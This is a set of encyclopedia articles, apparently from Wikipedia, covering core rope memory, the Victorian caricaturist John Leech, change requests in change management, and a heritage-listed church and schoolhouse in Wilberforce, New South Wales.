By the standards of the time, a relatively large amount of data could be stored in a small installed volume of core rope memory: 72 kilobytes per cubic foot, or roughly 2.5 megabytes per cubic meter. This was about 18 times the amount of data per volume compared to standard read-write core memory: the Block II Apollo Guidance Computer used 36,864 sixteen-bit words of core rope memory (placed within one cubic foot) and 2,048 sixteen-bit words (15 data bits+1 parity bit) of magnetic core memory (within two cubic feet).
Popular culture
In some moon landing conspiracy theories, confusion between core rope and regular core memory is used to advance the claim that the Apollo mission computer memory system could never have passed through the Earth's magnetic field undisturbed. Regular core memory would likely be susceptible to transiting magnetic fields of this magnitude, whereas core rope is not.
References
External links
"Computer for Apollo" NASA/MIT film from 1965 which demonstrates how rope memory was manufactured.
Visual Introduction to the Apollo Guidance Computer, part 3: Manufacturing the Apollo Guidance Computer. – By Raytheon; hosted by the Library of the California Institute of Technology's History of Recent Science & Technology site (originally hosted by the Dibner Institute)
Computers in Spaceflight: The NASA Experience – By James Tomayko (Chapter 2, Part 5, "The Apollo guidance computer: Hardware")
Brent Hilbert from the University of British Columbia has a detailed explanation of how core rope memory works.
Software woven into wire: Core rope and the Apollo Guidance Computer, extensive blog post by computer restoration expert Ken Shirriff
Computer memory
Non-volatile memory
|
277716
|
https://en.wikipedia.org/wiki/John%20Leech%20%28caricaturist%29
|
John Leech (caricaturist)
|
John Leech (29 August 1817 – 29 October 1864) was a British caricaturist and illustrator. He was best known for his work for Punch, a humorous magazine for a broad middle-class audience, combining verbal and graphic political satire with light social comedy. Leech catered to contemporary prejudices, such as anti-Americanism and antisemitism and supported acceptable social reforms. Leech's critical yet humorous cartoons on the Crimean War helped shape public attitudes toward heroism, warfare, and Britons' role in the world.
Leech also enjoys fame as the first illustrator of Charles Dickens' 1843 novella A Christmas Carol. He was furthermore a pioneer in comics, creating the recurring character Mr. Briggs and some sequential illustrated gags.
Early life
John Leech was born in London. His father, a native of Ireland, was the landlord of the London Coffee House on Ludgate Hill, "a man", on the testimony of those who knew him, "of fine culture, a profound Shakespearian, and a thorough gentleman." His mother was descended from the family of Richard Bentley. Like his father. Leech was skillful at drawing with a pencil, which he began doing at a very early age. When he was only three, he was discovered by John Flaxman, who was visiting, seated on his mother's knee, drawing with much gravity. The sculptor admired his sketch, adding, "Do not let him be cramped with lessons in drawing; let his genius follow its own bent; he will astonish the world"—advice which was followed. A mail-coach, done when he was six years old, is already full of surprising vigour and variety in its galloping horses. Leech was educated at Charterhouse School, where William Makepeace Thackeray, his lifelong friend, was a fellow pupil, and at sixteen he began to study for the medical profession at St Bartholomew's Hospital, where he won praise for the accuracy and beauty of his anatomical drawings. He was then placed under a Mr Whittle, an eccentric practitioner, the original of "Rawkins" in Albert Smith's Adventures of Mr Ledbury, and afterwards under Dr John Cockle; but gradually he drifted into the artistic profession. His nickname also being "Blicky" stuck with him during his life, along with being famous.
Artistic career
He was eighteen when his first designs were published, a quarto of four pages, entitled Etchings and Sketchings by A. Pen, Esq., comic character studies from the London streets. Then he drew some political lithographs, did rough sketches for Bell's Life, produced a popular parody on Mulready's postal envelope, and, on the death of Dickens illustrator Robert Seymour in 1836, unsuccessfully submitted his renderings to illustrate the Pickwick Papers.
In 1840 Leech began his contributions to the magazines with a series of etchings in Bentley's Miscellany, where George Cruikshank had published his plates to Jack Sheppard and Oliver Twist, and was illustrating Guy Fawkes in feebler fashion.
In company with the elder master Leech designed for the Ingoldsby Legends and Stanley Thorn, and until 1847 produced many independent series of etchings. These were not his best work; their technique is imperfect and we never feel that they express the artist's individuality, the Richard Savage plates, for instance, being strongly reminiscent of Cruikshank, and The Dance at Stamford Hall of Hablot Browne.
In 1845 Leech illustrated St Giles and St James in Douglas William Jerrold's new Shilling Magazine, with plates more vigorous and accomplished than those in Bentley, but it is in subjects of a somewhat later date, and especially in those lightly etched and meant to be printed with colour, that we see the artist's best powers with the needle and acid.
Among such of his designs are four charming plates to Charles Dickens's A Christmas Carol (1843), the broadly humorous etchings in the Comic History of England (1847–1848), and the still finer illustrations to the Comic History of Rome (1852) —which last, particularly in its minor woodcuts, shows some exquisitely graceful touches, as witness the fair faces that rise from the surging water in [[:File:Comic History of Rome p 052 Claelia and her Companions escaping from the Etruscan Camp.jpg|Cloelia and her Companions Escaping from the Etruscan Camp.]]Among his other etchings are those in Young Master Troublesome or Master Jacky's Holidays, and the frontispiece to Hints on Life, or How to Rise in Society (1845)—a series of minute subjects linked gracefully together by coils of smoke, illustrating the various ranks and conditions of men, one of them—the doctor by his patient's bedside—almost equalling in vivacity and precision the best of Cruikshank's similar scenes.
Then in the 1850s come the numerous etchings of sporting scenes, contributed, together with woodcuts, to the Handley Cross novels by Robert Smith Surtees.
Lithographic work
Leech's lithographic work includes the 1841 Portraits of the Children of the Mobility, an important series dealing with the humorous and pathetic aspects of London street "Arabs", which were afterwards so often and so effectively to employ the artist's pencil. Amid all the squalor which they depict, they are full of individual beauties in the delicate or touching expression of a face, in the graceful turn of a limb. The book is scarce in its original form, but in 1875 two reproductions of the outline sketches for the designs were published—a lithographic issue of the whole series, and a finer photographic transcript of six of the subjects, which is more valuable than even the finished illustrations of 1841, in which the added light and shade is frequently spotty and ineffective, arid the lining itself has not the freedom which we find in some of Leech's other lithographs, notably in the Fly Leaves, published at the Punch office, and in the inimitable subject of the nuptial couch of the Caudles, which also appeared, in woodcut form, as a political cartoon, with Mrs Caudle, personated by Brougham, disturbing by untimely loquacity the slumbers of the lord chancellor, whose haggard cheek rests on the woolsack for pillow.
Wood engraving
It was in work for the wood-engravers that Leech was most prolific and individual. Among the earlier of such designs are the illustrations to the Comic English and Latin Grammars (1840), to Written Caricatures (1841), to Hood's Comic Annual, (1842), and to Albert Smith's Wassail Bowl (1843), subjects mainly of a small vignette size, transcribed with the best skill of such woodcutters as Orrin Smith, and not, like the larger and later Punch illustrations, cut at speed by several engravers working at once on the subdivided block.
It was in 1841 that Leech's connection with Punch began, a connection which subsisted until his death, and resulted in the production of the best-known and most admirable of his designs. His first contribution appeared in the issue of 7 August, a full-page illustration—entitled Foreign Affairs of character studies from the neighbourhood of Leicester Square. His cartoons deal at first mainly with social subjects, and are rough and imperfect in execution, but gradually their method gains in power and their subjects become more distinctly political, and by 1849 the artist is strong enough to produce the splendidly humorous national personification which appears in Disraeli Measuring the British Lion.About 1845 we have the first of that long series of half-page and quarter-page pictures of life and manners, executed with a hand as gentle as it was skilful, containing, as Ruskin has said, "admittedly the finest definition and natural history of the classes of our society, the kindest and subtlest analysis of its foibles, the tenderest flattery of its pretty and well-bred ways", which has yet appeared.
In addition to his work for the weekly issue of Punch, Leech contributed largely to the Punch almanacks and pocket-books, from Once a Week between 1859 and 1862, to the Illustrated London News, where some of his largest and best sporting scenes appeared, and to innumerable novels and miscellaneous volumes besides, of which it is only necessary to specify A Little Tour in Ireland (1859). This last piece is noticeable as showing the artist's treatment of pure landscape, though it also contains some of his daintiest figure pieces, like that of the wind-blown girl, standing on the summit of a pedestal, with the swifts darting around her and the breadth of sea beyond.
Public exhibition
In 1862 Leech appealed to the public with a very successful exhibition of some of the most remarkable of his Punch drawings. These were enlarged by a mechanical process, and coloured in oils by the artist himself, with the assistance and under the direction of his friend John Everett Millais. Millais had earlier painted a portrait of a child reading Leech's comic book Mr Briggs' Sporting Tour.
Character
Leech was a rapid and indefatigable worker. Dean Hole said he observed the artist produce three finished drawings on the wood, designed, traced, and rectified, "without much effort as it seemed, between breakfast and dinner". The best technical qualities of Leech's art, his precision and vivacity in the use of the line, are seen most clearly in the first sketches for his woodcuts, and in the more finished drawings made on tracing-paper from these first outlines, before the chiaroscuro was added and the designs were transcribed by the engraver. Turning to the mental qualities of his art, it would be a mistaken criticism which ranked him as a comic draughtsman. Like Hogarth he was a true humorist, a student of human life, though he observed humanity mainly in its whimsical aspects,
Hitting all he saw with shafts
With gentle satire, kin to charity,
That harmed not.
The earnestness and gravity of moral purpose which is so constant a note in the work of Hogarth is indeed far less characteristic of Leech, but there are touches of pathos and of tragedy in such of the Punch designs as the Poor Man's Friend (1845), and General Février turned Traitor (1855), and in The Queen of the Arena in the first volume of Once a Week, which are sufficient to prove that more solemn powers, for which his daily work afforded no scope, lay dormant in their artist.
The purity and manliness of Leech's own character are impressed on his art. We find in it little of the exaggeration and grotesqueness, and none of the fierce political enthusiasm, of which the designs of James Gillray are so full. Compared with that of his great contemporary, George Cruikshank, his work is restricted both in compass of subject and in artistic dexterity.
In popular culture
Leech was played by Simon Callow in the 2017 film The Man Who Invented Christmas which depicts the 1843 writing and production of Dickens' A Christmas Carol.
Death
He died on the 29th October 1864 and was buried in Kensal Green Cemetery, close to his friend William Makepeace Thackeray (two graves to the left).
Gallery
References
Biographies of Leech have been written by
John Brown, John Leech, and Other Papers, D. Douglas, 1882 ; HardPress Publishing, 2013
Frederick G. Kitton, John Leech, artist and humorist: a biographical sketch (1883)
William Powell Frith, John Leech: His Life and Work (1891)
Further reading
Houfe, Simon. "Leech, John (1817–1864)", Oxford Dictionary of National Biography (Oxford University Press, 2004); online edn, 2014 Retrieved 13 June 2015
Houfe, Simon. John Leech and the Victorian scene (1984)
Markovits, Stefanie. The Crimean War in the British Imagination (Cambridge University Press, 2009), Chapter on Leech's artwork regarding the Crimean war
Miller, Henry J. "John Leech and the Shaping of the Victorian Cartoon: The Context of Respectability," Victorian Periodicals Review (2009) 42#3 pp 267–291.
Thackeray, William Makepeace. "John Leech's Pictures of Life and Character", Quarterly Review'' No. 191, Dec. 1854, online
External links
The John Leech Punch magazine sketch archives
English illustrators
English caricaturists
English comics artists
Artists from London
1817 births
1864 deaths
Burials at Kensal Green Cemetery
Charles Dickens
Punch (magazine) cartoonists
Alumni of the Medical College of St Bartholomew's Hospital
Artists' Rifles soldiers
People educated at Charterhouse School
|
3919967
|
https://en.wikipedia.org/wiki/Change%20request
|
Change request
|
A change request (aka Change Control Request, or CCR) is a document containing a call for an adjustment of a system; it is of great importance in the change management process.
A change request is declarative, i.e. it states what needs to be accomplished, but leaves out how the change should be carried out. Important elements of a change request are an ID, the customer (ID), the deadline (if applicable), an indication whether the change is required or optional, the change type (often chosen from a domain-specific ontology) and a change abstract, which is a piece of narrative (Keller, 2005). An example of a change request can be found in Figure 1 on the right.
Change requests typically originate from one of five sources:
problem reports that identify bugs that must be fixed, which forms the most common source
system enhancement requests from users
events in the development of other systems
changes in underlying structure and or standards (e.g. in software development this could be a new operating system)
demands from senior management (Dennis, Wixom & Tegarden, 2002).
Additionally, in Project Management, change requests may also originate from an unclear understanding of the goals and the objectives of the project.
Change requests have many different names, which essentially describe the same concept:
Request For Change (RFC) by Rajlich (1999); RFC is also a common term in ITIL (Keller, 2005) and PRINCE2 (Onna & Koning, 2003).
Engineering Change (EC) by Huang and Mak (1999);
Engineering Change Request (ECR) at Aero (Helms, 2002);
Engineering Change Order (ECO) by Loch and Terwiesch (1999) and Pikosz and Malmqvist (1998). Engineering Change Order is a separate step after ECR. After ECR is approved by Engineering Department then an ECO is made for making the change;
Change Notice at Chemical (Helms, 2002);
Action Request (AR) at ABB Robotics AB (Kajko-Mattson, 1999);
Change Request (CR) is, among others, used by Lam (1998), Mäkäräinen (2000), Dennis, et al. (2002), Crnkovic, Asklund and Persson-Dahlqvist (2003) and at ABB Automation Products AB (Kajko-Mattsson, 1999).
Operational Change Request (OCR).
Enterprise Change Request (ECR).
See also
Change management (engineering)
Change control
Change order
Engineering Change Order
References
Further reading
Crnkovic I., Asklund, U. & Persson-Dahlqvist, A. (2003). Implementing and Integrating Product Data Management and Software Configuration Management. London: Artech House.
Dennis, A., Wixom, B.H. & Tegarden, D. (2002). System Analysis & Design: An Object-Oriented Approach with UML. Hoboken, New York: John Wiley & Sons, Inc.
Helms, R.W. (2002). Product Data Management as enabler for Concurrent Engineering. PhD dissertation. Eindhoven: Eindhoven University of Technology press. Available online: http://alexandria.tue.nl/extra2/200211339.pdf.
Huang, G.H. & Mak, K.L. (1999). Current practices of engineering change management in UK manufacturing industries. International Journal of Operations & Production Management, 19(1), 21–37.
Kajko-Mattsson, M. (1999). Maintenance at ABB (II): Change Execution Processes (The State of Practice). Proceedings of the International Conference on Software Maintenance, 307–315.
Keller, A. (2005). Automating the Change Management Process with Electronic Contracts. Proceedings of the 2005 Seventh IEEE International Conference on E-Commerce Technology Workshops, 99-108.
Lam, W. (1998). Change Analysis and Management in a Reuse-Oriented Software Development Setting. In Pernici, B. & Thanos, C. (Eds.) Proceedings of the Tenth International Conference on Advanced Information Systems Engineering, 219–236.
Loch, C.H. & Terwiesch, C. (1999). Accelerating the Process of Engineering Change Orders: Capacity and Congestion Effects. Journal of Product Innovation Management, 16(2), 145–159.
Mäkäräinen, M. (2000). Software change management processes in the development of embedded software. PhD dissertation. Espoo: VTT Publications. Available online: http://www.vtt.fi/inf/pdf/publications/2000/P416.pdf.
Onna, M. van & Koning, A. (2003). The Little Prince 2: A Practical Guide to Project Management, Pink Roccade Educational Services/Ten Hagen Stam.
Pikosz, P. & Malmqvist, J. (1998). A comparative study of engineering change management in three Swedish engineering companies. Proceedings of the DETC98 ASME Design Engineering Technical Conference, 78–85.
Rajlich, V. (1999). Software Change and Evolution. In Pavelka, J., Tel, G. & Bartošek, M. (Eds.), SOFSEM'99, Lecture Notes in Computer Science 1725, 189–202.
DiDonato, P. (2001). Oakley Inc, Developing XML systems with (CRF).
Systems engineering
Business terms
|
58788484
|
https://en.wikipedia.org/wiki/St%20John%27s%20Anglican%20Church%20and%20Macquarie%20Schoolhouse
|
St John's Anglican Church and Macquarie Schoolhouse
|
St John's Anglican Church and Macquarie Schoolhouse is a heritage-listed Anglican church building and church hall located at 43-43a Macquarie Road, Wilberforce, City of Hawkesbury, New South Wales, Australia. The church was designed by Edmund Blacket and built from 1819 to 1859 by James Atkinson, senior; and the schoolhouse was built by John Brabyn. The church is also known as the St. John's (Blacket) Church, while the hall (former schoolhouse) is also known as the Macquarie Schoolhouse/Chapel and the Wilberforce Schoolhouse. It was added to the New South Wales State Heritage Register on 20 August 2010.
History
The Darug (various spellings) occupied the area from Botany Bay to Port Jackson north-west to the Hawkesbury and into the Blue Mountains. The cultural life of the Darug was reflected in the art they left on rock faces. Before 1788, there were probably 5,000 to 8,000 Aboriginal people in the Sydney region. Of these, about 2,000 were probably inland Darug, with about 1,000 living between Parramatta and the Blue Mountains. They lived in bands of about 50 people, and each band hunted over its own territory. The Gommerigal-tongarra lived on both sides of South Creek. The Boorooboorongal lived on the Nepean from Castlereagh to Richmond. Little information was collected about the Aborigines of the Hawkesbury before their removal by white settlement so details of their lifestyle have to be inferred from the practices of other south-eastern Aborigines. It is believed they lived in bark gunyahs. The men hunted game and the women foraged for food.
On 15 December 1810, Macquarie issued an Order laying out five towns along the Hawkesbury River. One at Green Hills would be called Windsor. Another at Richmond Hill District would be called Richmond. A third in the Nelson district would be named Pitt Town. The village in the Phillip district would be called Wilberforce and the fifth in the Evan district was Castlereagh. Nearby settlers would be allotted sites on these towns to build. Reverend Samuel Marsden was instructed by Macquarie on 2 February 1811 to consecrate the burial grounds at the new towns on the Hawkesbury including Wilberforce. Surveyor Evans would show him the areas set aside.
Macquarie Schoolhouse
Macquarie's Instructions from the Colonial Office included not just the establishment of towns but also the creation of schools, a policy with which Macquarie was in complete agreement. His Order of 11 May 1811 strongly recommended to parents and family heads "The Education and Instruction of the Youth of both Sexes being an Object of the utmost Importance, as laying the Foundation of many Advantages to the rising Generations". Macquarie encouraged local residents to fund and establish schools themselves but also assisted with government funds. His Order of 11 May 1811 encouraged the establishment of schoolhouses at the initiative of local communities and promised to contribute A£25 of government money to each schoolhouse. At the same time, he directed that settlers should no longer bury their dead on their farms but in the burial grounds consecrated and measured out "some time since" in places such as Wilberforce.
Schoolhouses were often used for religious purposes until churches were erected near them in the 1850s. These combined schoolhouses, chapels and schoolmaster's residences were a feature of early Macquarie towns on the Hawkesbury. They were built at Castlereagh, Wilberforce, Pitt Town and Richmond often sited in commanding positions with a square nearby.
Reverend Cartwright was paid A£10 before 1 July 1812 for "inclosing the Burial Ground at the Township of Wilberforce". Macquarie's journal noted he visited Wilberforce on 21 May 1813 to mark the site for a new schoolhouse. The Government contributed A£50 towards "Building a Government temporary Chapel and School House, in the Township of Wilberforce" in 1813. On 28 April 1814, he reported that schoolhouses, which would serve as temporary chapels, had already been erected at various places including Wilberforce. It was not a major school. On 20 April 1818 he informed Samuel Marsden that apart from schools in major centres there were also inferior schools at places such as Wilberforce teaching the rudiments of education.
In 1819, a new brick building replaced the earlier temporary one.
Convicted London joiner and carpenter James Gough (1790-1876) who arrived on the Earl Spencer in 1813 and gained his conditional pardon in 1821, won the private contract to build a school at Wilbeforce.
By 30 September 1819, John Brabyn had been paid A£200 for "erecting a School-house and temporary Place of Worship at Wilberforce". On 31 May 1820, D Wentworth paid Brabyn an additional A£85/16/1 for enlarging and completing the School House. This may have funded the skillion at the rear. The skillion addition seems to have been an afterthought to accommodate the schoolmaster but seems to be almost contemporary with the main building as the brick work and fireplace are bonded into the main building. It has been claimed that it was built of sun-dried bricks with stone quoins and was whitewashed with lime to which fat had been added to protect it from the weather. However, in the absence of documentary proof or physical analysis to confirm it this claim cannot be verified. The original roof was of open timberwork with three tie beams. Shutters originally protected the windows. At a later stage, verandahs were added on the western, southern and part of the eastern side.
In September 1821, the Sydney Gazette reported that there were "thriving and ably-conducted Public Schools" at Wilberforce, Pitt Town and Richmond. The Schoolmaster at Wilberforce was William Gow who lived in the lower rooms. The school continued to operate throughout the 1820s. Total enrolments varied between 30 and 40 pupils.
A Government Order in the Sydney Gazette of 1823 states that the annual musters are to be held in the schoolhouse at Wilberforce.
When surveyor Felton Mathew drew his plan of Wilberforce in July 1833, he showed the schoolhouse building as a "Church". A later plan of the town used in the Surveyor-General's Dept included a sketch of this building labelled as "Church & School".
One of the schoolhouse pupils of this period was Fred Ward, born in Windsor in 1835, who later adopted the alias Captain Thunderbolt as the last of the professional bushrangers of NSW.
The schoolhouse was no longer used as a church after the new St John's Church was completed in 1859. The land had not yet been vested in the Church. On 9 August 1858, surveyor Charles S Whitaker transmitted his plan of the allotment in Wilberforce for the Church of England Church, School and Parsonage. The plan showed the new Church along Macquarie Street and the school building at the rear, plus fencing and some topography. On 16 July 1863, an area of 7 acres 2 roods and 15 perches at Wilberforce, part of Section 13, was dedicated to the public for a Church of England Church, School and Parsonage. A formal grant for the school site was not issued until 16 February 1872. An area of 3 acres 1 rood 21 perches was granted to William Bragg, John Henry Fleming and James Rose Buttsworth as trustees of the schoolhouse site (T-shaped parcel of land) under Church of England. On the same day, the church and parsonage sites on either side were also granted.
In 1864, Inspector McCredie reported to the Council of Education that the schoolhouse was much in need of repair. In 1865, he reported it had been repaired for A£80. Varying dates have been given for the closure of the building as a school. One source gives the date as 1874. However, Wilberforce was not on the 1879 list of Denominational Schools closed since 1872. The 1880 list of Anglican Denominational Schools operating listed one at Wilberforce with 42 pupils enrolled. The new Public School opened on 6 July 1880 and the older schoolhouse apparently closed that year. The 1881 list of Anglican Denominational Schools did not include one at Wilberforce. Thereafter, it seems to have been used as a church hall.
When surveyor Charles Robert Scrivener surveyed Wilberforce on 22 August 1894, his plan showed the "Old Church" i.e. schoolhouse and the "New Church". A drawing of the schoolhouse by William Johnson dated about 1900 showed what appeared to be a brick building with a shingle roof, five multi-paned sash windows on the upper floor and four on the lower with central doorway and verandah at front, apparently also shingled. A brick chimney was at the side.
A verandah was added on the western side at an unknown date clad with shingles later replaced by corrugated iron. The exterior was cement rendered in 1911 to arrest the fretting of the brickwork and the skillion was also cement rendered shortly afterwards. A photograph by Kerry & Co dated from 1890 (copied in 1932) showed the roof as shingled. A photograph of 1920 showed the schoolhouse with a shingled roof. Another photograph dated as 1937 showed the roof clad with corrugated iron, suggesting that it was re-roofed in the 1920s or 1930s. The former steep staircase was replaced by one with a gentler grade in 1966. The original shutters have disappeared. A photograph of 1970 in Wymark showed the original multi-paned windows replaced by what appear to be double-hung sash windows. Another photo in Wymark which is not as clear suggests that the windows had been replaced as early as 1920. A fire in 1985 meant much of the roof and interior timberwork was replaced.
A tombstone for John Howorth (died 1804) located on the south side of the Macquarie schoolhouse was moved here in 1960 from the farm near the river south of the village where he was originally buried. It is also included in this listing. It demonstrates burial practices on the Hawkesbury before official cemeteries were established there in Macquarie's period as governor.
St John's Church
At a public meeting on 4 November 1846 called by Reverend T. C. Ewing, public support for building a new church for Wilberforce was sought. The schoolroom used as a place of worship was no longer large enough for the congregation and according to Joshua Vickery "a school-room was not a proper place in which to worship". A committee was formed to erect the new church and a sum of A£100/15/0 was subscribed. If A£300 could be raised they were entitled to government aid. By February 1848, a plan of the proposed church prepared by Edmund Blacket, was available for viewing at the schoolhouse.
A grant of A£450 was approved by the Executive Council of NSW in 1850 to erect the church. Reverend T C Ewing informed the Colonial Secretary on 24 January 1854 that construction of the church had been delayed by the gold rushes. He asked if the funds in support were still available. The builder was James Atkinson. On 13 August 1856, James Atkinson, senior, builder of Windsor advertised for "three or four good Quarrymen and three or four good Masons, to perform the work of a Church". Reverend Frederic Barker, Bishop of Sydney, laid the foundation stone of the new church on 17 December 1856.
After architect Edmund T. Blacket approved the work completed up to 27 April 1857 by J Atkinson amounting in value to A£648, the bulk of funds voted by parliament were transferred to the church. Alexander Dawson, the Colonial Architect, valued the work at A£1,310 on 11 September 1858. The balance of A£20 of the grant was then paid to the church on 17 September 1858.
The Bishop of Sydney consecrated the new church on 12 April 1859 and 29 people were confirmed. The teacher at the school, John Wenban, presented a sundial to the church at its consecration and it remains in place.
A photograph by Kerry & Co dated from 1890 (copied in 1932) showed the church roof as shingled. A photograph of 1920 also showed the church with a shingled roof. The roof was reclad with fibro slates in 1950.
In 1914, the interior and exterior stonework was tuckpointed. An oak Communion Table and Reredos were presented by the parishioners to the church at the centenary of the schoolhouse/chapel. Electric light was installed in St John's Church in 1934. In 1970, three hanging kerosene lamps were still suspended from the ceiling.
The east and west windows ( and 1878) are memorials to Dunston family members. The Dunston family was one with a long association with the district and church. John Henry Fleming's memorial window () commemorates another with a close association with the church.
Description
Macquarie Schoolhouse
The Macquarie School House at Wilberforce is the only surviving example of a small number of school houses which combined a schoolroom and schoolmaster's residence with the schoolroom serving as a church on Sundays.
The school house is a two-storey Colonial Georgian building with a hipped roof and ground floor verandah to the west and south. The verandah roof returns along the east side where it becomes part of a rear skillion. The front facade, facing west, is divided into five bays.
The former schoolhouse is constructed of brick. The bricks to the main building are soft bricks of local red clay. It is not clear whether the bricks were fired or were just sundried. The few bricks in the original part of the building that are visible have lost their outside skin. The bricks to the skillion appear to be of a different clay, suggesting that the skillion was a slightly later addition. Render on the external walls and plaster on the internal walls makes it difficult to assess these bricks in detail.
The roof is sheeted in galvanised steel with close eaves and the walls are rendered with ashlar coursing. The render dates from . Sandstone quoins are on the corners of the front (west) elevation. There are two corbelled brick chimneys, one on the north side and one on the east. Both chimneys are expressed on the external face of the wall.
The framing to the verandah is not original. When the verandah was replaced, the verandah roofline was also altered at the southeast corner. The skillion meets the wall of the main building at a higher level than the verandah. Early photos show the roof of the skillion continuing across the full length of the east side. The verandah roof now returns around the southeast corner to meet the south wall of the skillion.
Windows to the ground floor are nine over six pane double hung sashes to the original part of the building. The skillion has windows with six over six pane double-hung sashes. Windows to the first floor are six over six pane double-hung sashes and are unusual in having a deep timber frame at the head. All the windows in the main part of the building have timber lintels. Those in the skillion have low brick arches. The doors are ledged and sheeted with beaded boards. The front door retains its original gudgeon pins and iron brackets for the internal security rail. It is in an arched opening with a rendered panel above the transom.
A series of plaques on the south wall of the building record the construction and development of the building and commemorate a number of the schoolmasters who served at the school.
Internally, the building has a simple layout. The ground floor of the main part of the building has two rooms and a stair hall. The skillion also has two rooms connected by a very low door. The first floor is a single large room. A later six panelled door connects the north room of the main building to the north room of the skillion. The walls of the ground floor rooms are plastered. Ceilings in the ground floor of the main part of the building are sheeted and battened, ceilings in the skillion are ripple iron. The first floor has exposed roof framing. Three heavy timber tie beams that appear to be original survive. The main roof framing and boards above were replaced after the 1985 fire. The fireplace at the north end of the first floor retains some elements of the original timber chimneypiece.
A headstone for John Howorth (died 1804), now located next to the schoolhouse, is included in the listing. It was moved in the 1960s from its original location where he was buried on a Hawkesbury farm . It dates from the period before the establishment of the burial ground at Wilberforce when the dead were buried on their farms. It is believed to be the oldest known tombstone from the Hawkesbury region.
The site contains a significant view corridor from the verandah of the Schoolhouse to the Wilberforce Cemetery.
St John's Church
St John's Anglican Church is a Victorian Academic Gothic style church set at an angle to the street to enable the church to face east. The church is a simple gabled building of four bays, with a gabled chancel at the east end, a gabled porch on the south side and a gabled vestry on the north side of the chancel.
The church has a steeply pitched roof of compressed cement sheet shingles, replacing the original timber shingles. Modern colorbond barge flashings have replaced the original exposed ends of the shingles and battens. The roof steps down at the east end to mark the narrowing of the church for the chancel.
The body of the walls of the church are of pointed sandstone, with smooth-faced stone around the narrow pointed arched windows. The walls have been repointed in cementious mortar. At the west end is an elegant belfry, still with its bell.
The windows are framed in metal and have diamond pattern leadlight to the top and bottom sashes. The central sash is a pivot sash. Taller stained glass windows are at the east and west ends. The doors are framed and sheeted in pointed-arched openings. Moulded timber battens have been applied to the external face of the doors to emphasise the appearance of vertical joints. A simple iron handrail is on the side of the southern entry porch.
An important feature on the north wall is the original sundial, still marking the time with accuracy. It is painted with the hours of the day in Roman numerals, the date 1859 and the initials of its creator John Wenban.
Internally, the church retains its original sandstone walls, although these have been painted in the vestry. It is not known whether the exposed cedar hammerbeam roof trusses and timber boarding are original fabric. The internal fixtures and fittings are largely non-original fabric. These include: the cedar pulpit, dado and altar rail in the chancel: the gothic style cedar altar; the iron cord cleats fixed to cedar roses on the windows, and brass hooks holding iron brackets for candles that are fixed to the cedar roses. An oak Communion Table and Reredos date from 1920.
Around the walls of the church are a variety of memorial tablets commemorating notable local citizens, former ministers and those lost in war as well as tablets marking commemorative events.
The two light East window is a memorial to Elizabeth Dunston who died in 1899 and her husband John Dunston who had died in 1876. Another window in the nave is in memory of John Fleming, who died in 1894. The West end windows are in memory of John Thomas Dunstan, who died in 1878. The manufacturer is not known.
St John's Church
St John's Church is substantially intact in its form, setting and external appearance apart from the replacement of the original timber shingle roof with cement sheet shingles. Much of the internal detail and fittings is also intact. Some sandstone blocks have weathered more quickly than others but most are in excellent condition. Some of the joints on the keystones over the northern and southern entry porches have cracked but apart from a small crack where the southern wall joins the south-east buttress, the rest of the joints appear to be in fine condition. A few asbestos slates on the roof are slipping. Overall, the church appears to be in excellent condition.
As the location of the original temporary schoolhouse/chapel, one of the earliest known buildings in Wilberforce, which pre-dates the current 1819 Macquarie schoolhouse/chapel, this site has archaeological potential. Since the location of the original school/chapel building is not known, potentially the whole site is involved.
Although modified over the years and repaired after fire damage, the Macquarie Schoolhouse still retains its original form and fenestration. Some of the internal joinery, notably the roof tie-beams, and the hardware on some doors still survives. In view of its age, the Schoolhouse has a high degree of original fabric. St John's Church is intact in its form and setting apart from the replacement of the original timber shingle roof with cement sheet shingles. Much of the internal detail and fittings are non-original fabric.
Modifications and dates
Former Macquarie Schoolhouse/Chapel:
External render c. 1911
Internal stair 1920s, 1966 and 1980s
Shingle roof replaced with corrugated iron possibly 1920s or 1930s
Corrugated steel roof c. 1985
New roof framing c. 1985 (three original tie beams retained)
The first floor windows were replaced after a fire in 1985.
Alteration to junction of verandah and skillion roof c. 1985?
Concrete slab to ground floor.
St John's (Blacket) Church:
Roof replaced with compressed cement sheet shingles, 1950.
Colorbond barge flashings
Cement pointing internally and externally 1914
Oak Communion Table and Reredos added 1920
Painting of walls in vestry
Heritage listing
Wilberforce Schoolhouse was erected to meet the desire of Governor Lachlan Macquarie to promote education and religion at the core of towns he laid out on the Hawkesbury. His scheme of establishing a school, church and burial ground at an elevated and/or central position was completely realised at Wilberforce during his governorship. He chose the sites of the town, church and burial ground personally. His creation of these towns in 1810 was an important expression of the developmental philosophy of settlement coupled with deliberate social engineering to control convict society and to implant a moral economy into their lifestyles. The establishment of the Schoolhouse demonstrated the importance Governor Macquarie attached to educating the children of the emancipated convicts of the Hawkesbury who constituted the rising generation of colonial freeborn.
Of all the church/school/cemetery centres established in the four towns where this combination was established (i.e. Castlereagh, Pitt Town, Wilberforce and Richmond) the combination at Wilberforce is the one which is mostly intact, with the schoolhouse surviving from his governorship in conjunction with the cemetery in a commanding position above the town. By laying out the village, selecting the site of the square, church and cemetery, plus promoting the construction of the schoolhouse-cum-chapel, Governor Lachlan Macquarie left his personal signature on the village of Wilberforce. The curtilage includes the significant view corridor from the verandah of the Schoolhouse to Wilberforce Cemetery. The church of St John completed in 1859 to the design of architect Edmund T Blacket added an additional element which secured the continued use of this site for its original purpose by enabling the congregation to continue meeting in a building which could accommodate them all. St John's Anglican Church is a fine example of a simple rural church in the Victorian Gothic style by the esteemed nineteenth-century architect Edmund Blacket. Blacket designed over 100 churches, of which over 30 were small churches often in rural locations for small congregations. Designed in 1847 and erected between 1857 and 1859, St John's Church at Wilberforce is intact in its form and setting and a fine example of Blacket's early, small rural churches.
The church has a rare example of a vertical sundial in Australia, the work of the former schoolmaster, John Wenban.
St John's Anglican Church and Macquarie Schoolhouse was listed on the New South Wales State Heritage Register on 20 August 2010 having satisfied the following criteria.
The place is important in demonstrating the course, or pattern, of cultural or natural history in New South Wales.
It meets this criterion of State significance because the Wilberforce Schoolhouse was erected to meet the desire of Governor Lachlan Macquarie to promote education and religion at the core of the towns he laid out on the Hawkesbury. His scheme of establishing a school, church and burial ground at an elevated and/or central position was fully realised at Wilberforce during his governorship.
